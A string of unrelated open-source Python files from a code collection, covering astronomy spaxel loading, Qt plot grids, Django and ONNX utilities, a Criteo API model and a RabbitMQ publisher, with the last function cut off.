                if obj.wcs.naxis == 2:
                    self.ra, self.dec = obj.wcs.wcs_pix2world([[self.x, self.y]], 0)[0]
                elif obj.wcs.naxis == 3:
                    # 3D WCS includes the spectral axis; discard it.
                    self.ra, self.dec, __ = obj.wcs.wcs_pix2world([[self.x, self.y, 0]], 0)[0]

    def save(self, path, overwrite=False):
        """Pickles the spaxel to a file.

        Parameters:
            path (str):
                The path of the file to which the `.Spaxel` will be saved.
                Unlike for other Marvin Tools that derive from
                `~marvin.tools.core.MarvinToolsClass`, ``path`` is
                mandatory for `.Spaxel.save` as there is no default path for a
                given spaxel.
            overwrite (bool):
                If True, and the ``path`` already exists, overwrites it.
                Otherwise it will fail.

        Returns:
            path (str):
                The realpath to which the file has been saved.

        """

        return marvin.core.marvin_pickle.save(self, path=path, overwrite=overwrite)

    @classmethod
    def restore(cls, path, delete=False):
        """Restores a Spaxel object from a pickled file.

        If ``delete=True``, the pickled file will be removed after it has been
        unplickled. Note that, for objects with ``data_origin='file'``, the
        original file must exists and be in the same path as when the object
        was first created.

        """

        return marvin.core.marvin_pickle.restore(path, delete=delete)

    def load(self, force=None):
        """Loads the spaxel data.

        Loads the spaxel data for cubes/maps/modelcube. By default attempts
        to load whatever is specified when spaxels are instantianted from other
        Marvin Tools. Can manually force load a data type with the force
        keyword.

        Parameters:
        -----------
        force : {cube|maps|modelcube}
            Datatype to force load.
        """

        if self.loaded and force is None:
            warnings.warn('already loaded', MarvinUserWarning)
            return

        assert force in [None, 'cube', 'maps', 'modelcube'], \
            'force can only be cube, maps, or modelcube'

        for tool in ['cube', 'maps', 'modelcube']:
            self._load_tool(tool, force=(force is not None and force == tool))

        self._set_radec()

        self.loaded = True

        # Metadata may have become available only after loading the tools.
        for attr in ['mangaid', 'plateifu', 'release', 'bintype', 'template']:
            setattr(self, attr, self._check_versions(attr))

        self.datamodel = DataModel(self.release)

    def _load_tool(self, tool, force=False):
        """Loads the tool and the associated quantities."""

        # Map the tool name to its class, loader method, and quantity dict.
        if tool == 'cube':
            class_name = marvin.tools.cube.Cube
            method = self.getCube
            quantities_dict = 'cube_quantities'
        elif tool == 'maps':
            class_name = marvin.tools.maps.Maps
            method = self.getMaps
            quantities_dict = 'maps_quantities'
        elif tool == 'modelcube':
            class_name = marvin.tools.modelcube.ModelCube
            method = self.getModelCube
            quantities_dict = 'modelcube_quantities'

        attr_value = getattr(self, '_' + tool)

        # Tool was explicitly disabled and load is not being forced.
        if (attr_value is False or attr_value is None) and force is False:
            setattr(self, '_' + tool, None)
            return

        if not isinstance(attr_value, class_name):
            if tool == 'modelcube' and self.release == 'MPL-4':
                warnings.warn('ModelCube cannot be instantiated for MPL-4.', MarvinUserWarning)
                self._modelcube = None
                return
            else:
                setattr(self, '_' + tool, method())
        else:
            if force is True:
                warnings.warn('{0} is already loaded'.format(tool), MarvinUserWarning)

        self._parent_shape = getattr(getattr(self, '_' + tool), '_shape')

        # Extract this spaxel's quantities from the freshly loaded tool.
        setattr(self, quantities_dict,
                getattr(getattr(self, '_' + tool), '_get_spaxel_quantities')(self.x, self.y,
                                                                            spaxel=self))

    def getCube(self):
        """Returns the associated `~marvin.tools.cube.Cube`"""

        if isinstance(self._cube, marvin.tools.cube.Cube):
            return self._cube

        # ``_cube`` may hold a path; otherwise fall back to the identifiers.
        cube_input = (self._cube if self._cube is not True else None) \
            or self.plateifu or self.mangaid

        return marvin.tools.cube.Cube(cube_input, release=self.release, **self._kwargs)

    def getMaps(self):
        """Returns the associated `~marvin.tools.maps.Maps`"""

        if isinstance(self._maps, marvin.tools.maps.Maps):
            return self._maps

        maps_input = (self._maps if self._maps is not True else None) \
            or self.plateifu or self.mangaid

        return marvin.tools.maps.Maps(maps_input, bintype=self.bintype,
                                      template=self.template, release=self.release,
                                      **self._kwargs)

    def getModelCube(self):
        """Returns the associated `~marvin.tools.modelcube.ModelCube`"""

        if isinstance(self._modelcube, marvin.tools.modelcube.ModelCube):
            return self._modelcube

        modelcube_input = (self._modelcube if self._modelcube is not True else None) \
            or self.plateifu or self.mangaid

        return marvin.tools.modelcube.ModelCube(modelcube_input, bintype=self.bintype,
                                                template=self.template, release=self.release,
                                                **self._kwargs)

    @property
    def quality_flags(self):
        """Bundle Cube DRP3QUAL and Maps DAPQUAL flags."""

        drp3qual = self.datamodel.drp.bitmasks['MANGA_DRP3QUAL']
        cube = self.getCube()
        drp3qual.mask = int(cube.header['DRP3QUAL'])

        qual_flags = [drp3qual]

        # MPL-4 predates the DAPQUAL bitmask.
        if self.release != 'MPL-4':
            qual_flags.append(self.datamodel.dap.bitmasks['MANGA_DAPQUAL'])

        return qual_flags
| 2 | 2 |
torchcam/cams/__init__.py | alexandrosstergiou/torch-cam | 749 | 12764981 | <reponame>alexandrosstergiou/torch-cam
from .cam import *
from .gradcam import *
from .utils import *
| 0.800781 | 1 |
supasurvey/runtests.py | invisiblehands/django-supasurvey | 3 | 12764982 | <filename>supasurvey/runtests.py<gh_stars>1-10
#!/usr/bin/env python
import sys
from django.conf import settings
def runtests():
    """Run the supasurvey test suite and exit with a failure status code."""
    from django.test.utils import get_runner
    runner_cls = get_runner(settings)
    runner = runner_cls(verbosity=1, interactive=True)
    failure_count = runner.run_tests(['supasurvey'])
    sys.exit(bool(failure_count))
# Allow invoking the suite directly: ``python runtests.py``.
if __name__ == '__main__':
    runtests()
| 1.851563 | 2 |
dfirtrack_config/migrations/0014_main_overview.py | thomas-kropeit/dfirtrack | 273 | 12764983 | <gh_stars>100-1000
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add ``main_overview`` to ``MainConfigModel``.

    The new field selects which overview page (artifact / case / system /
    tag / task) acts as the main landing view; it defaults to the system
    overview.
    """

    dependencies = [
        ('dfirtrack_config', '0013_csvimporterconfigmodel'),
    ]

    operations = [
        migrations.AddField(
            model_name='mainconfigmodel',
            name='main_overview',
            field=models.CharField(
                choices=[
                    ('main_overview_artifact', 'Artifact'),
                    ('main_overview_case', 'Case'),
                    ('main_overview_system', 'System'),
                    ('main_overview_tag', 'Tag'),
                    ('main_overview_task', 'Task'),
                ],
                default='main_overview_system',
                max_length=50,
            ),
        ),
    ]
| 1.8125 | 2 |
infer.py | bennyguo/sketch2model | 21 | 12764984 | <filename>infer.py<gh_stars>10-100
import os
from options.infer_options import InferOptions
from data import create_dataset
from models import create_model
import torch
if __name__ == '__main__':
    # Parse CLI options and build the inference dataset in a fixed order.
    opt = InferOptions().parse()
    dataset_infer = create_dataset(opt, mode='infer', shuffle=False)
    model = create_model(opt)
    # setup() returns the epoch of the restored checkpoint, used to name the
    # output directory.
    current_epoch = model.setup(opt)
    out_dir = os.path.join(opt.results_dir, opt.name, 'infer_{}'.format(current_epoch), opt.data_name)
    print('creating out directory', out_dir)
    os.makedirs(out_dir, exist_ok=True)
    model.eval()
    # Disable autograd during inference to save memory and time.
    with torch.no_grad():
        model.inference(current_epoch, dataset_infer, save_dir=out_dir)
| 2.390625 | 2 |
examples/check_model.py | Idein/onnigiri | 2 | 12764985 | <gh_stars>1-10
import sys
import numpy as np
import onnx
import onnxruntime
def make_sess(path: str) -> onnxruntime.InferenceSession:
    """Create a CPU-only inference session with quiet (error-level) logging."""
    options = onnxruntime.SessionOptions()
    options.log_severity_level = 3
    return onnxruntime.InferenceSession(
        path, sess_options=options, providers=["CPUExecutionProvider"]
    )
if __name__ == "__main__":
assert len(sys.argv) == 5
target_dir = sys.argv[1]
origin = sys.argv[2]
pre = sys.argv[3]
post = sys.argv[4]
pre_model = onnx.load(pre)
post_model = onnx.load(post)
internal_names = [v.name for v in pre_model.graph.output]
output_names = [v.name for v in post_model.graph.output]
inputs = dict()
input_values = list()
for i in pre_model.graph.input:
shape = list()
for d in i.type.tensor_type.shape.dim:
shape.append(d.dim_value)
dtype = onnx.mapping.TENSOR_TYPE_TO_NP_TYPE[i.type.tensor_type.elem_type]
if len(shape) != 0:
v = np.random.randn(*shape).astype(dtype)
inputs[i.name] = v
input_values.append(v)
pre_sess = make_sess(pre)
internal_values = pre_sess.run(internal_names, inputs)
vs = dict()
for k, v in zip(internal_names, internal_values):
vs[k] = v
post_sess = make_sess(post)
outputs = post_sess.run(output_names, vs)
sess = make_sess(origin)
expeced = sess.run(output_names, inputs)
for a, b in zip(expeced, outputs):
print("check")
assert np.all(abs(a - b) < 1e-4)
print("pass")
| 2.015625 | 2 |
swan/widgets/plot_grid.py | INM-6/swan | 3 | 12764986 | """
Created on Nov 21, 2013
@author: <NAME>
In this module you can find the :class:`MyPlotGrid`, which is a
:class:`PyQt5.QtWidgets.QWidget` wrapping a scroll area, with some additions.
More important is the :class:`MyPlotContent`.
It shows an overview of many :class:`src.myplotwidget.MyPlotWidget`
and manages them.
"""
from pyqtgraph.Qt import QtCore, QtGui, QtWidgets
from swan.widgets.plot_widget import MyPlotWidget
from swan.widgets.indicator_cell import IndicatorWidget
from numpy.random import choice
class MyPlotGrid(QtWidgets.QWidget):
    """A scrollable container widget hosting a :class:`MyPlotContent` grid."""

    def __init__(self, *args, **kwargs):
        QtWidgets.QWidget.__init__(self, *args, **kwargs)
        self.main_grid_layout = QtWidgets.QGridLayout()
        self.scroll_area = QtWidgets.QScrollArea(self)
        self.scroll_area.setWidgetResizable(True)
        # Always show both scroll bars so the visible area stays predictable.
        self.scroll_area.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
        self.scroll_area.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
        # The actual plot grid lives inside the scroll area.
        self.child = MyPlotContent(self)
        self.scroll_area.setWidget(self.child)
        self.main_grid_layout.addWidget(self.scroll_area)
        self.setLayout(self.main_grid_layout)
        self.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.MinimumExpanding)

    def minimumSizeHint(self) -> QtCore.QSize:
        """Minimum sensible size for the grid view."""
        return QtCore.QSize(600, 400)
class MyPlotContent(QtWidgets.QWidget):
"""
A class that manages :class:`src.myplotwidget.MyPlotWidget`
objects in a grid.
The *args* and *kwargs* are passed to :class:`PyQt5.QtWidgets.QWidget`.
"""
plot_selected = QtCore.pyqtSignal(object, bool)
indicator_toggle = QtCore.pyqtSignal()
visibility_toggle = QtCore.pyqtSignal(int, int, bool)
def __init__(self, *args, **kwargs):
"""
**Properties**
*_shape* (tuple of integer):
The shape of the plot grid.
Format: (rows, cols)
*_plots* (list of :class:`src.myplotwidget.MyPlotWidget`):
The plots in a list for iterating over them.
*_selected* (list of :class:`MyPlotWidget`):
A list containing the selected plots.
*_rows* (dictionary):
A dictionary containing the row as key and a list
of plots as value for the plots in that row.
*_cols* (dictionary):
A dictionary containing the column as key and a list
of plots as value for the plots in that column.
*_yrange* (tuple of float):
The y range all plots should have.
"""
QtWidgets.QWidget.__init__(self, *args, **kwargs)
self.grid_layout = QtWidgets.QGridLayout(self)
self._shape = None
self._plots = []
self._indicators = []
self._selected = []
self._rows = {}
self._cols = {}
self._yrange = (-0.001, 0.0006)
self._xrange = (0, 0)
self._second_select = None
self._width = 60
self._height = 45
self._constant_dimension = 75
self._plot_gray = QtGui.QColor(180, 180, 180, 85)
self.sample_waveform_number = 500
self.grid_layout.setColumnStretch(1000, 1000)
self.grid_layout.setRowStretch(1000, 1000)
self.grid_layout.setHorizontalSpacing(1)
self.grid_layout.setVerticalSpacing(1)
def make_plots(self, rows, cols, dates=None):
"""
Creates a plot grid of the given shape.
**Arguments**
*rows* (integer):
The number of rows of the grid.
*cols* (integer):
The number of columns of the grid.
"""
self.delete_plots()
self._shape = (rows, cols)
self._plots = []
self._indicators = []
self._rows = {}
self._cols = {}
pivot_indicator = IndicatorWidget("Sessions (dd.mm.yy)\n\u2192\n\n\u2193 Units",
indicator_type='pivot', position=None,
width=self._width, height=self._height,
const_dim=self._constant_dimension)
pivot_indicator.responsive = False
self.grid_layout.addWidget(pivot_indicator, 0, 0, QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft)
for global_unit_id in range(rows):
iw = IndicatorWidget(
str(global_unit_id + 1), indicator_type='unit', position=global_unit_id,
width=self._width, height=self._height, const_dim=self._constant_dimension
)
self._indicators.append(iw)
iw.select_indicator.connect(self.indicator_toggled)
self.grid_layout.addWidget(iw, global_unit_id + 1, 0, QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft)
for session_id in range(cols):
if dates is not None:
iw = IndicatorWidget(
str(session_id + 1) + " (" + str(dates[session_id].strftime("%d.%m.%y")) + ")",
indicator_type='session', position=session_id,
width=self._width, height=self._height, const_dim=self._constant_dimension
)
else:
iw = IndicatorWidget(
str(session_id), indicator_type='session', position=session_id,
width=self._width, height=self._height, const_dim=self._constant_dimension
)
self._indicators.append(iw)
iw.select_indicator.connect(self.indicator_toggled)
self.grid_layout.addWidget(iw, 0, session_id + 1, QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft)
for unit_id in range(rows):
self._rows[unit_id] = []
for session_id in range(cols):
if session_id not in self._cols:
self._cols[session_id] = []
plot_widget = MyPlotWidget(width=self._width, height=self._height)
self._plots.append(plot_widget)
plot_widget.pos = (session_id, unit_id)
self._rows[unit_id].append(plot_widget)
self._cols[session_id].append(plot_widget)
plot_widget.select_plot.connect(self.select_plot)
plot_widget.colour_strip_toggle.connect(self.toggle_indicator_colour)
plot_widget.visibility_toggle.connect(self.toggle_plot_visibility)
self.grid_layout.addWidget(plot_widget, unit_id + 1, session_id + 1,
QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft)
return self._plots
@QtCore.pyqtSlot(object, int)
def toggle_indicator_colour(self, colour, i):
iw = next((x for x in self._indicators if x.row == i))
if any(plot.has_plot for plot in self._rows[i]):
iw.toggle_colour_strip(colour)
else:
iw.toggle_colour_strip(None)
@QtCore.pyqtSlot(object)
def indicator_toggled(self, indicator):
row = indicator.row
col = indicator.col
indicator_type = indicator.indicator_type
if indicator_type == 'unit':
plot_widgets = [pw for pw in self._plots if pw.pos[1] == row]
elif indicator_type == 'session':
plot_widgets = [pw for pw in self._plots if pw.pos[0] == col]
else:
plot_widgets = []
for pw in plot_widgets:
if not indicator.selected:
if indicator_type == 'session':
pw.enable("col")
elif indicator_type == 'unit':
pw.enable("row")
else:
pw.disable()
if indicator_type == 'session':
pw.inhibited_by_col = True
elif indicator_type == 'unit':
pw.inhibited_by_row = True
self.indicator_toggle.emit()
def toggle_plot_visibility(self, session_id, unit_id, visible):
self.visibility_toggle.emit(session_id, unit_id, visible)
def delete_plots(self):
"""
Deletes all plots.
"""
for p in self._plots:
p.close()
for i in self._indicators:
i.close()
def clear_plots(self):
"""
Clears all plots.
"""
for p in self._plots:
p.clear_()
p.enable("all")
for i in self._indicators:
i.colourStrip.hide()
if not i.selected:
i._bg = i.bgs["selected"]
i.set_background(i._bg)
i.selected = True
def do_plot(self, vum, data):
"""
Plots data on all plots.
**Arguments**
*vum* (:class:`src.virtualunitmap.VirtualUnitMap`):
Is needed to get the mapping.
*data* (:class:`src.neodata.NeoData`):
Is needed to get the data.
"""
active = vum.get_active()
for session in range(len(active)):
for global_unit_id in range(len(active[session])):
plot_widget = self.find_plot(global_unit_id, session)
if plot_widget.to_be_updated:
plot_widget.clear_()
pen_colour = vum.get_colour(global_unit_id)
plot_widget.default_pen_colour = pen_colour
if active[session][global_unit_id]:
unit = vum.get_realunit(session, global_unit_id, data)
mean_waveform = data.get_data("average", unit)
# all_waveforms = data.get_data("all", unit)
# try:
# plot_widget.plot_many(all_waveforms[choice(all_waveforms.shape[0],
# size=self.sample_waveform_number,
# replace=False)],
# self._plot_gray)
# except ValueError:
# plot_widget.plot_many(all_waveforms, self._plot_gray)
plot_widget.plot(mean_waveform.magnitude, pen_colour)
plot_widget.hasPlot = True
plot_widget.toggle_colour_strip(pen_colour)
plot_widget.plot_widget.setXRange(0., data.get_wave_length(), padding=None, update=True)
else:
plot_widget.toggle_colour_strip(pen_colour)
plot_widget.to_be_updated = False
def set_all_for_update(self):
for plot in self._plots:
plot.to_be_updated = True
def find_plot(self, global_unit_id, session_id):
"""
Finds a plot at a given position.
**Arguments**
*global_unit_id* (integer):
The row index.
*session_id* (integer):
The column index.
**Returns**: :class:`src.myplotwidget.MyPlotWidget`
The plot at position (global_unit_id, session_id).
"""
return self._rows[global_unit_id][session_id]
@QtCore.pyqtSlot(object)
def highlight_plot(self, item):
if item.opts['clickable']:
unit_id = item.opts['unit_id']
session = item.opts['session']
p = self.find_plot(unit_id, session)
self.select_plot(p, not p.selected)
def select_plot(self, plot, select):
"""
Selects or deselects a plot on the grid.
If nothing is selected, the plot will be selected.
Second selection is only allowed if the plot is in the same column
as the other one and if not two are already selected.
**Arguments**
*plot* (:class:`src.myplotwidget.MyPlotWidget`):
The plot to (de)select.
*select* (boolean):
Whether or not the plot should be selected.
"""
if select:
if len(self._selected) == 1 and self._selected[0].pos[0] == plot.pos[0]:
self._selected.append(plot)
plot.change_background(select)
plot.selected = select
self._second_select = plot
self.plot_selected.emit(plot, select)
elif not self._selected:
self._selected.append(plot)
plot.change_background(select)
plot.selected = select
self._second_select = None
self.plot_selected.emit(plot, select)
elif self._second_select is not None and self._selected[0].pos[0] == plot.pos[0]:
self._selected.remove(self._second_select)
self._second_select.change_background(not select)
self._second_select.selected = not select
self.plot_selected.emit(self._second_select, not select)
self._second_select = plot
self._selected.append(plot)
plot.change_background(select)
plot.selected = select
self.plot_selected.emit(plot, select)
elif plot in self._selected:
self._selected.remove(plot)
plot.change_background(select)
plot.selected = select
self.plot_selected.emit(plot, select)
def reset_selection(self):
"""
Resets the selection.
"""
for p in self._selected:
p.selected = False
p.change_background(False)
self._selected = []
def get_selection(self):
"""
**Returns**: list of :class:`src.myplotwidget.MyPlotWidget`
The selected plots.
"""
return self._selected
def zoom_in(self, step=25.0):
"""
Zooms in the plots.
**Arguments**
*step* (float):
The zoom step percentage.
Default: 25.0 percent.
"""
for plot in self._plots:
plot.change_size(width=step, height=step)
for indicator in self._indicators:
indicator.change_size(width=step, height=step)
def zoom_out(self, step=25.0):
"""
Zooms out the plots.
**Arguments**
*step* (float):
The zoom step percentage.
Default: 25.0 percent.
"""
for plot in self._plots:
plot.change_size(width=-step, height=-step)
for indicator in self._indicators:
indicator.change_size(width=-step, height=-step)
def expand(self, step=150):
"""
Increases the y range of the plots.
**Arguments**
*step* (integer):
The expand step.
Default: 150 pixels.
"""
self.set_yranges(self._yrange[0] - step, self._yrange[1] + step)
def collapse(self, step=150):
"""
Decreases the y range of the plots.
**Arguments**
*step* (integer):
The collapse step.
Default: 150 pixels.
"""
self.set_yranges(self._yrange[0] + step, self._yrange[1] - step)
def set_yranges(self, min0, max0):
    """
    Sets the y range of every plot and remembers it.

    **Arguments**

        *min0* (float):
            The minimal y.
        *max0* (float):
            The maximal y.

    """
    self._yrange = (min0, max0)
    # Push the new range down to each wrapped pyqtgraph widget.
    for holder in self._plots:
        holder.plot_widget.setYRange(min0, max0, padding=None, update=True)
def set_xranges(self, min0, max0):
    """
    Sets the x ranges of all plots.

    **Arguments**

        *min0* (float):
            The minimal x.
        *max0* (float):
            The maximal x.

    """
    # Docstring previously said "y ranges" -- it was copy-pasted from
    # set_yranges; this method sets the X axis.
    self._xrange = (min0, max0)
    for plot in self._plots:
        plot.plot_widget.setXRange(min0, max0, padding=None, update=True)
def set_tooltips(self, tooltips):
    """
    Sets tool tips for all plots.

    **Arguments**

        *tooltips* (dictionary):
            A dictionary containing for each column of the grid
            a list of strings with the tool tips for that column.

    """
    for col, plots in self._cols.items():
        # zip pairs each plot in the column with its tooltip string.
        for tip, plot in zip(tooltips[col], plots):
            plot.set_tooltip(tip)
def swap_tooltips(self, p1, p2):
    """
    Swaps the tooltips for two plots that have been swapped.
    """
    # Read both tips before writing either, so the swap is safe.
    first, second = p1.toolTip(), p2.toolTip()
    p1.set_tooltip(second)
    p2.set_tooltip(first)
| 2.8125 | 3 |
CommonTools/PileupAlgos/python/PUPuppi_cff.py | ckamtsikis/cmssw | 852 | 12764987 | import FWCore.ParameterSet.Config as cms
from CommonTools.PileupAlgos.Puppi_cff import *
# Clone of the standard Puppi producer with inverted weighting
# (invertPuppi=True); presumably this keeps the pileup-like candidates
# instead of the leading-vertex ones -- TODO confirm against the Puppi
# producer documentation.
pupuppi = puppi.clone(
    invertPuppi = True
)
| 1.148438 | 1 |
criteo_marketing_transition/models/patch_ad_set.py | criteo/criteo-python-marketing-transition-sdk | 0 | 12764988 | # coding: utf-8
"""
Criteo API Transition Swagger
This is used to help Criteo clients transition from MAPI to Criteo API # noqa: E501
The version of the OpenAPI document: 1.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class PatchAdSet(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Attribute name -> declared OpenAPI type (used by to_dict for recursion).
    openapi_types = {
        'name': 'str',
        'scheduling': 'PatchAdSetScheduling',
        'bidding': 'PatchAdSetBidding',
        'targeting': 'AdSetTargeting',
        'budget': 'PatchAdSetBudget'
    }

    # Attribute name -> JSON key in the API payload.
    attribute_map = {
        'name': 'name',
        'scheduling': 'scheduling',
        'bidding': 'bidding',
        'targeting': 'targeting',
        'budget': 'budget'
    }

    def __init__(self, name=None, scheduling=None, bidding=None, targeting=None, budget=None):  # noqa: E501
        """PatchAdSet - a model defined in OpenAPI"""  # noqa: E501
        self._name = None
        self._scheduling = None
        self._bidding = None
        self._targeting = None
        self._budget = None
        self.discriminator = None
        # Only assign attributes that were explicitly provided; the rest stay None.
        if name is not None:
            self.name = name
        if scheduling is not None:
            self.scheduling = scheduling
        if bidding is not None:
            self.bidding = bidding
        if targeting is not None:
            self.targeting = targeting
        if budget is not None:
            self.budget = budget

    @property
    def name(self):
        """Gets the name of this PatchAdSet.  # noqa: E501

        Name of the ad set  # noqa: E501

        :return: The name of this PatchAdSet.  # noqa: E501
        :rtype: str
        """
        return self._name

    @name.setter
    def name(self, name):
        """Sets the name of this PatchAdSet.

        Name of the ad set  # noqa: E501

        :param name: The name of this PatchAdSet.  # noqa: E501
        :type: str
        """
        self._name = name

    @property
    def scheduling(self):
        """Gets the scheduling of this PatchAdSet.  # noqa: E501

        :return: The scheduling of this PatchAdSet.  # noqa: E501
        :rtype: PatchAdSetScheduling
        """
        return self._scheduling

    @scheduling.setter
    def scheduling(self, scheduling):
        """Sets the scheduling of this PatchAdSet.

        :param scheduling: The scheduling of this PatchAdSet.  # noqa: E501
        :type: PatchAdSetScheduling
        """
        self._scheduling = scheduling

    @property
    def bidding(self):
        """Gets the bidding of this PatchAdSet.  # noqa: E501

        :return: The bidding of this PatchAdSet.  # noqa: E501
        :rtype: PatchAdSetBidding
        """
        return self._bidding

    @bidding.setter
    def bidding(self, bidding):
        """Sets the bidding of this PatchAdSet.

        :param bidding: The bidding of this PatchAdSet.  # noqa: E501
        :type: PatchAdSetBidding
        """
        self._bidding = bidding

    @property
    def targeting(self):
        """Gets the targeting of this PatchAdSet.  # noqa: E501

        :return: The targeting of this PatchAdSet.  # noqa: E501
        :rtype: AdSetTargeting
        """
        return self._targeting

    @targeting.setter
    def targeting(self, targeting):
        """Sets the targeting of this PatchAdSet.

        :param targeting: The targeting of this PatchAdSet.  # noqa: E501
        :type: AdSetTargeting
        """
        self._targeting = targeting

    @property
    def budget(self):
        """Gets the budget of this PatchAdSet.  # noqa: E501

        :return: The budget of this PatchAdSet.  # noqa: E501
        :rtype: PatchAdSetBudget
        """
        return self._budget

    @budget.setter
    def budget(self, budget):
        """Sets the budget of this PatchAdSet.

        :param budget: The budget of this PatchAdSet.  # noqa: E501
        :type: PatchAdSetBudget
        """
        self._budget = budget

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Recursively serialize nested generated models, and lists/dicts that
        # contain them, by delegating to their own to_dict().
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, PatchAdSet):
            return False

        # Generated models compare by full attribute dictionary.
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| 1.734375 | 2 |
src/robot_service/rabbitmq.py | kenesparta/movie-service-api | 4 | 12764989 | import pika
import config
class RabbitMq:
    """Publish messages to a RabbitMQ queue over a blocking pika connection."""

    def __init__(self):
        self.conn = None
        self.channel = None
        self.__config = config.RABBITMQ
        self.__connect()

    def __connect(self):
        """Open the blocking connection and declare the configured queue."""
        params = pika.ConnectionParameters(host=self.__config['HOST'])
        self.conn = pika.BlockingConnection(params)
        self.channel = self.conn.channel()
        self.channel.queue_declare(queue=self.__config['QUEUE'])

    def send_message(self, message: str):
        """Publish *message* to the configured queue, then close the connection.

        NOTE(review): the connection is closed after a single publish, so each
        RabbitMq instance is single-use -- confirm this is intentional.
        """
        properties = pika.BasicProperties(delivery_mode=2)  # 2 = persistent
        self.channel.basic_publish(
            exchange='',
            routing_key=self.__config['QUEUE'],
            body=message,
            properties=properties,
        )
        self.conn.close()
| 2.671875 | 3 |
django_grapesjs/forms/fields.py | TheLazzziest/django_grapesjs | 6 | 12764990 | from django import forms
from django_grapesjs.settings import BASE, GRAPESJS_DEFAULT_HTML, REDACTOR_CONFIG
from django_grapesjs.utils import apply_string_handling
from .widgets import GrapesJsWidget
__all__ = (
'GrapesJsField',
)
class GrapesJsField(forms.CharField):
    '''
    Form field rendered with the GrapesJS editor widget.
    '''
    widget = GrapesJsWidget

    def __init__(self, default_html=GRAPESJS_DEFAULT_HTML, html_name_init_conf=REDACTOR_CONFIG[BASE],
                 apply_django_tag=False, validate_tags=False, template_choices=None, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Forward the editor configuration onto the widget.
        widget = self.widget
        widget.default_html = default_html
        widget.html_name_init_conf = html_name_init_conf
        widget.apply_django_tag = apply_django_tag
        widget.template_choices = template_choices
        self.validate_tags = validate_tags

    def validate(self, value):
        super().validate(value)
        # TODO: check the field
        # if self.validate_tags:

    def clean(self, value):
        # Normalize the submitted HTML before the standard CharField cleaning.
        normalized = apply_string_handling(value, 'apply_tag_save')
        return super().clean(normalized)
| 2.125 | 2 |
split_data/test/test_wiki_vector_summary.py | taisa831/Chainer-Slack-Twitter-Dialogue | 0 | 12764991 | <reponame>taisa831/Chainer-Slack-Twitter-Dialogue<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), "../"))
from input_file import InputFile
from split_synonym_class import SplitSynonymClass
import pyximport
pyximport.install()
from wiki_vector_summary_cython import WikiVectorSummaryCython
from os import path
APP_ROOT = path.dirname(path.abspath(__file__))
class Test_WikiVectorSummary(unittest.TestCase):
    """Test wiki Vector class.
    """

    def setUp(self):
        """
        setting initial paramater
        Args:
            data: test file name
            split_module: setting the split_module instance
        """
        wiki_vector_file_name = APP_ROOT + '/../../Data/jawiki_vector/jawiki_vector_delete_first.txt'
        self.word_net_file_name = APP_ROOT + '/../../Data/wnjpn-all.tab'
        # wiki_vector_file_name = APP_ROOT + '/../../Data/jawiki_vector/jawiki_vector_part.txt'
        # self.word_net_file_name = APP_ROOT + '/../../Data/wnjpn-all_part.tab'
        self.input_module = InputFile(wiki_vector_file_name)

    def test_summary_class(self):
        """
        test make summary dict
        """
        self.input_module.input_fast_large_file()
        wiki_vector = self.input_module.get_vector()
        self.input_module = InputFile(self.word_net_file_name)
        self.input_module.input_special_format_file("\t")
        test_data = self.input_module.get_file_data()
        self.split_synonym_class = SplitSynonymClass(test_data)
        self.split_synonym_class.make_dict()
        # test all dict
        all_dict = self.split_synonym_class.get_all_dict()
        # test split dict
        split_dict = self.split_synonym_class.get_split_dict()
        self.wiki_vector_summary = WikiVectorSummaryCython(all_dict, split_dict, wiki_vector)
        self.wiki_vector_summary.get_similler_word()
        split_dict = self.wiki_vector_summary.get_split_dict()
        # FIX: write with print(..., file=...) inside a context manager instead
        # of rebinding sys.stdout -- the old pattern leaked file handles and
        # left stdout redirected if print() raised.
        for k, v in split_dict.items():
            with open(APP_ROOT + "/../../Data/wn_summary_all/" + k + ".txt", 'w') as fo:
                print(v, file=fo)
        class_average_vector = self.wiki_vector_summary.get_wiki_average_vector()
        for k, v in class_average_vector.items():
            with open(APP_ROOT + "/../../Data/wn_summary_all_class_average/" + k + ".txt_vector.txt", 'w') as fo:
                print(v, file=fo)
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
| 2.296875 | 2 |
cli/iotexetl/utils/string_utils.py | blockchain-etl/iotex-etl | 3 | 12764992 | import base64
def base64_string(val):
    """Encode *val* (bytes) as a base64 ASCII string.

    None and empty bytes both map to None.
    """
    if val is None or val == b'':
        return None
    encoded = base64.b64encode(val)
    return encoded.decode('utf-8')
def to_int(val):
    """Best-effort conversion to int.

    bytes are decoded big-endian (empty bytes give 0), strings are parsed
    with int(), None stays None, and anything else passes through unchanged.
    """
    if val is None:
        return None
    if isinstance(val, bytes):
        # int.from_bytes(b'', 'big') is 0, covering the empty-bytes case.
